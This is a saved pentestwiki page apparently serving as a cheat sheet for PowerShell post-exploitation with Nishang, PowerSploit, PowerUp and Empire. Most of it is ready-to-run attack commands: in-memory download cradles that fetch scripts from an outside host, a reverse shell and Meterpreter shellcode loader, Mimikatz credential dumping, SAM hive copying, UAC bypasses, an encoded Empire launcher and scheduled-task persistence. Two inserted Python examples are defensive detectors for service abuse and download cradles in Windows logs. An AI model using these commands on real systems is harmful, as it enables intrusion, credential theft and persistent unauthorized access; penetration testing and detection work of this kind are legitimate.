created: 2022-04-19T19:54:02 (UTC +08:00)
tags: []
source: https://pentestwiki.org/powershell-frameworks-post-exploitation/
author:

PowerShell frameworks for Post-exploitation - pentestwiki.org

Excerpt

Learn how to use different powershell frameworks for post-exploitation techniques: Nishang, Powersploit, Empire, WinEnum among others





In this section we review several PowerShell frameworks that support the post-exploitation phase of a penetration test.

Intro to PowerShell

To check the version:

  $PSVersionTable.PSVersion

PowerShell versions by operating system:

  1. PowerShell v1.0: Win XP SP2, 2003 Server SP1, Vista
  2. PowerShell v2.0: Win 7, Server 2008 R2
  3. PowerShell v3.0: Win 8, Server 2012
  4. PowerShell v4.0: Win 8.1, Server 2012 R2
  5. PowerShell v5.0: Win 10

Change default colors:

  $host.ui.RawUI.ForegroundColor = "black"
  $host.ui.RawUI.BackgroundColor = "white"
  clear

To compile a .ps1 script into an .exe, use "PowerGUI Pro script editor".

  • List hotfixes

  Get-HotFix

Equivalent using wmic:

  wmic qfe list
  • Detect sandboxed environment

The BIOS name and serial number usually give away a virtual machine or sandbox:

  Get-WmiObject win32_bios | Format-List Name,SerialNumber
  • Handling Certificates

To list installed certificates (the current user's personal store and the local machine store):

  Get-ChildItem -Path "Cert:\CurrentUser\My"
  Get-ChildItem -Path "Cert:\LocalMachine"

Using the GUI:

  certmgr.msc

To create a self-signed certificate:

  $cert = New-SelfSignedCertificate -certstorelocation cert:\localmachine\my -dnsname testcert.example.org

  • Show system uptime:

  Get-CimInstance -ClassName win32_operatingsystem | select csname, lastbootuptime

Some examples of PowerShell Scripts

Capturing a screenshot

  Param(
      [Parameter(Mandatory = $true)][string]$Path
  )
  # File name built from the host name and a timestamp, e.g. "HOST - 2022-04-19_195402.bmp"
  $FileName = "$env:COMPUTERNAME - $(Get-Date -f yyyy-MM-dd_HHmmss).bmp"
  $File = "$Path\$FileName"
  # .NET types for screen metrics and bitmap drawing
  Add-Type -AssemblyName System.Windows.Forms
  Add-Type -AssemblyName System.Drawing
  # VirtualScreen covers all monitors, not just the primary one
  $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
  $Width = $Screen.Width
  $Height = $Screen.Height
  $Left = $Screen.Left
  $Top = $Screen.Top
  $bitmap = New-Object System.Drawing.Bitmap $Width, $Height
  $graphic = [System.Drawing.Graphics]::FromImage($bitmap)
  # Copy the whole virtual screen into the bitmap and write it to disk
  $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
  $bitmap.Save($File)
  Write-Output "Screenshot saved to:"
  Write-Output $File

Source: https://www.pdq.com/blog/capturing-screenshots-with-powershell-and-net/

Nishang Framework

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

In Kali Linux the scripts are installed under /usr/share/nishang.

Loading a Nishang script from disk and calling its function:

  powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Port-Scan.ps1'; Port-Scan -StartAddress 192.168.56.101 -EndAddress 192.168.56.105 -ResolveHost -ScanPort}"

  powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Remove-Update.ps1'; Remove-Update KB2534366}"

  powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Invoke-CredentialsPhish.ps1'; Invoke-CredentialsPhish}"

  powershell.exe -exec bypass -Command "& {Import-Module 'C:\Users\User\Desktop\temp\Get-PassHashes.ps1'; Get-PassHashes}"

Fileless execution with Nishang (the script is fetched over HTTP from $IP and run in memory without touching disk):

  powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/Check-VM.ps1'); Check-VM"

Does not work on Windows 7:

  powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP/winpost/Invoke-PowerShellTcp.ps1'); Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 443"

On Windows 7, download the script to disk first and import it:

  powershell -ep bypass -command "(New-Object Net.WebClient).DownloadFile('http://$IP/winpost/Invoke-PowerShellTcp.ps1', 'Invoke-PowerShellTcp.ps1'); Import-Module .\Invoke-PowerShellTcp.ps1; Invoke-PowerShellTcp -IPAddress $LOCALIP -Reverse -Port 443"

Other useful modules:

  • Powerpreter
  • Out-CHM
  • Out-Word
  • Out-Excel
  • Out-HTA

Powersploit Framework

With the PowerSploit directory served over HTTP on port 8000 of $IP, the modules are loaded in memory the same way:

  powershell.exe -exec bypass -Command "IEX (New-Object Net.WebClient).DownloadString('http://$IP:8000/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost $LOCALIP -Lport 4444 -Force"

  IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Recon/Invoke-ReverseDnsLookup.ps1"); Invoke-ReverseDnsLookup -IpRange $IP/24

  IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-Mimikatz.ps1"); Invoke-Mimikatz -DumpCreds

  IEX (New-Object Net.WebClient).DownloadString("http://$IP:8000/Exfiltration/Invoke-NinjaCopy.ps1"); Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "C:\Users\master\Desktop\SAM"

Powersploit modules: PowerUP

PowerUp is a PowerShell tool to assist with local privilege escalation on Windows systems. It contains several methods to identify and abuse vulnerable services, as well as DLL hijacking opportunities, vulnerable registry settings, and escalation opportunities. It is part of PowerSploit and resides at https://github.com/PowerShellMafia/PowerSploit/tree/master/Privesc. Empire implements PowerUp’s escalation functionality in the privesc/powerup/* modules.

  powershell.exe -nop -exec bypass
  Import-Module .\PowerUp.ps1
  Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

Powersploit modules: BypassUAC

  Import-Module .\bypass-uac.ps1

Does not work on Windows Server 2012:

  Bypass-UAC -Method UacMethodSysprep

Works on Windows Server 2012:

  Bypass-UAC -Method ucmDismMethod
  Bypass-UAC -Method UacMethodMMC2

Powersploit modules: Trojanize DLL

See also Msfvenom Payloads Cheat Sheet.

Powersploit modules: Trojanize Windows Service

  Write-ServiceBinary [-Name] <String> [-UserName <String>] [-Password <String>] [-LocalGroup <String>] [-Credential <PSCredential>] [-Command <String>] [-Path <String>]

Source: https://powersploit.readthedocs.io/en/latest/Privesc/Write-ServiceBinary/
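The conditions PowerUp's service checks look for (a service binary sitting in a user-writable directory, an unquoted ImagePath with spaces, either one running as SYSTEM) and the artifact Write-ServiceBinary leaves behind (a service whose binary was replaced) are also what a defender reviews in "new service installed" records (System log, Event ID 7045). The following is an added example, not code from PowerUp, PowerSploit or pentestwiki: it parses the message text of 7045 records and reports those that match. The records are constructed for the demo, and the prefix list of user-writable directories is an assumption; on a real host the binary's directory ACL, not a path prefix, decides.

```python
import re

# Directories an unprivileged user can normally write to. Assumption for the demo;
# on a real host check the directory ACL instead of relying on a prefix list.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\temp\\", "c:\\windows\\temp\\", "c:\\programdata\\")

# Fields of the 7045 message body, one per line.
FIELD_RE = re.compile(
    r"^(Service Name|Service File Name|Service Type|Service Start Type|Service Account):\s*(.*)$",
    re.M,
)


def parse_7045(record: str) -> dict:
    """Turn the message text of one 7045 record into a field dictionary."""
    return {name: value.strip() for name, value in FIELD_RE.findall(record)}


def executable_path(image_path: str) -> str:
    """Extract the executable from an ImagePath: a quoted path is taken verbatim,
    an unquoted one up to the first '.exe'."""
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    m = re.match(r"(.*?\.exe)", s, re.I)
    return m.group(1) if m else s.split(" ", 1)[0]


def assess(record: str) -> dict:
    """Findings for one record; an empty list means nothing stood out."""
    fields = parse_7045(record)
    image = fields.get("Service File Name", "")
    exe = executable_path(image)
    findings = []
    if exe.lower().startswith(USER_WRITABLE_PREFIXES):
        findings.append("binary in user-writable directory")
    # Unquoted path with spaces: the SCM may try C:\Program.exe before the real binary.
    if not image.strip().startswith('"') and " " in exe:
        findings.append("unquoted path with spaces")
    if findings and fields.get("Service Account", "").lower() in ("localsystem", "nt authority\\system"):
        findings.append("runs as SYSTEM")
    return {"service": fields.get("Service Name", "?"), "exe": exe, "findings": findings}


def review(records):
    """Only the records that produced findings."""
    return [r for r in (assess(rec) for rec in records) if r["findings"]]


# Constructed 7045 message bodies: one ordinary service, one binary dropped under a
# user profile, one unquoted path with spaces.
SAMPLE_RECORDS = [
    "Service Name: wuauserv\nService File Name: C:\\Windows\\system32\\svchost.exe -k netsvcs\n"
    "Service Type: user mode service\nService Start Type: demand start\nService Account: LocalSystem",
    "Service Name: UpdaterSvc\nService File Name: C:\\Users\\master\\AppData\\Local\\Temp\\updater.exe\n"
    "Service Type: user mode service\nService Start Type: auto start\nService Account: LocalSystem",
    "Service Name: VendorAgent\nService File Name: C:\\Program Files\\Vendor Tools\\agent.exe -svc\n"
    "Service Type: user mode service\nService Start Type: auto start\nService Account: LocalSystem",
]

if __name__ == "__main__":
    for r in review(SAMPLE_RECORDS):
        print(r["service"], r["exe"], ", ".join(r["findings"]))
```

Feed it the message text of real 7045 records exported from the System log; a hit on "binary in user-writable directory" plus "runs as SYSTEM" is the pattern a PowerUp-style service abuse produces, and "unquoted path with spaces" is the misconfiguration PowerUp's Get-UnquotedService reports.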

Empire Framework

Empire is a PowerShell and Python post-exploitation agent.

Installation:

  git clone https://github.com/EmpireProject/Empire.git
  cd Empire/
  ./setup/install.sh

Usage:

  ./empire
  (Empire) > listeners
  (Empire: listeners) > uselistener http
  (Empire: listeners/http) > execute
  (Empire: listeners/http) > launcher powershell
  powershell -noP -sta -w 1 -enc SQBmACgAJA<REDACTED>QB8AEkARQBYAA==
  (Empire: listeners/http) >

Run the generated PowerShell launcher on the Windows target to open a session in Empire:

  powershell -noP -sta -w 1 -enc SQBmACgAJA<REDACTED>QB8AEkARQBYAA==
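The Nishang and PowerSploit one-liners above share one shape (an execution-policy bypass plus an in-memory download cradle built from Net.WebClient, DownloadString and IEX) and the Empire launcher adds -noP, a hidden window and an -enc blob, which is the script as base64 of UTF-16LE text. That shape is what script-block logging (Event ID 4104) and process-creation logging (Event ID 4688) capture. The following is an added example, not code from the page or from Nishang, PowerSploit or Empire: it decodes -enc payloads and flags lines that combine several of these indicators. The log lines are constructed for the demo and their "timestamp, event id, text" layout is an assumption about the export format; the test-net address 198.51.100.7 stands in for the staging host.

```python
import base64
import re

# Parts of an in-memory download cradle; two or more together count as a cradle.
CRADLE_PATTERNS = [
    re.compile(r"net\.webclient", re.I),
    re.compile(r"downloadstring|downloadfile", re.I),
    re.compile(r"\biex\b|invoke-expression", re.I),
]

# Launcher switches seen in the commands above, keyed by the label reported.
SWITCH_PATTERNS = {
    "exec-bypass": re.compile(r"-(exec|ep|executionpolicy)\s+bypass", re.I),
    "no-profile": re.compile(r"-nop(rofile)?\b", re.I),
    "hidden-window": re.compile(r"-w(indowstyle)?\s+(1|hidden)\b", re.I),
}

# -EncodedCommand (and its short forms) followed by a base64 blob.
ENC_RE = re.compile(r"-(encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument; used here only to construct sample data."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str):
    """-EncodedCommand carries the script as base64 of UTF-16LE text; None if the blob is not that."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_line(line: str) -> dict:
    """Report the indicators found in one log line, searching the decoded payload as well."""
    enc = ENC_RE.search(line)
    decoded = decode_encoded_command(enc.group(2)) if enc else None
    text = line if decoded is None else line + " " + decoded
    indicators = ["encoded-command"] if enc else []
    indicators += [label for label, pat in SWITCH_PATTERNS.items() if pat.search(text)]
    if sum(1 for pat in CRADLE_PATTERNS if pat.search(text)) >= 2:
        indicators.append("download-cradle")
    return {"line": line, "decoded": decoded, "indicators": indicators}


def find_suspicious(lines, min_indicators=2):
    """Lines carrying at least min_indicators distinct indicators."""
    results = [score_line(line) for line in lines]
    return [r for r in results if len(r["indicators"]) >= min_indicators]


# Constructed sample lines: an Empire-style encoded launcher, a Nishang-style cradle,
# and two ordinary administrative commands that must not be flagged.
SAMPLE_LINES = [
    "2022-04-19T10:01:02Z 4688 powershell -noP -sta -w 1 -enc " + encode_command(
        "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7:8000/launcher.ps1')"),
    "2022-04-19T10:03:15Z 4104 powershell.exe -exec bypass -Command \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://198.51.100.7/Check-VM.ps1'); Check-VM\"",
    "2022-04-19T10:05:00Z 4104 Get-HotFix | Sort-Object InstalledOn",
    "2022-04-19T10:06:30Z 4104 Invoke-WebRequest -Uri https://example.com/update.json -OutFile update.json",
]

if __name__ == "__main__":
    for r in find_suspicious(SAMPLE_LINES):
        print(", ".join(r["indicators"]), "<-", r["line"][:80])
        if r["decoded"]:
            print("   decoded:", r["decoded"])
```

Requiring two indicators keeps a lone -ExecutionPolicy Bypass (common in legitimate deployment scripts) out of the results, while an encoded command whose decoded text contains a cradle is caught even though nothing in the raw line mentions WebClient; the decoded text is what a script-block log would also record once the launcher runs.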

To manage agents in Empire:

  agents
  interact $AGENTID
  rename [old name] [new name]

Advanced modules:

  bypassuac http
  set Listener http
  run

Or, without writing to disk:

  usemodule privesc/bypassuac_wscript

For credential gathering:

  mimikatz

Persistence:

  usemodule persistence/elevated/schtasks

WinEnum

A PowerShell privilege escalation enumeration script.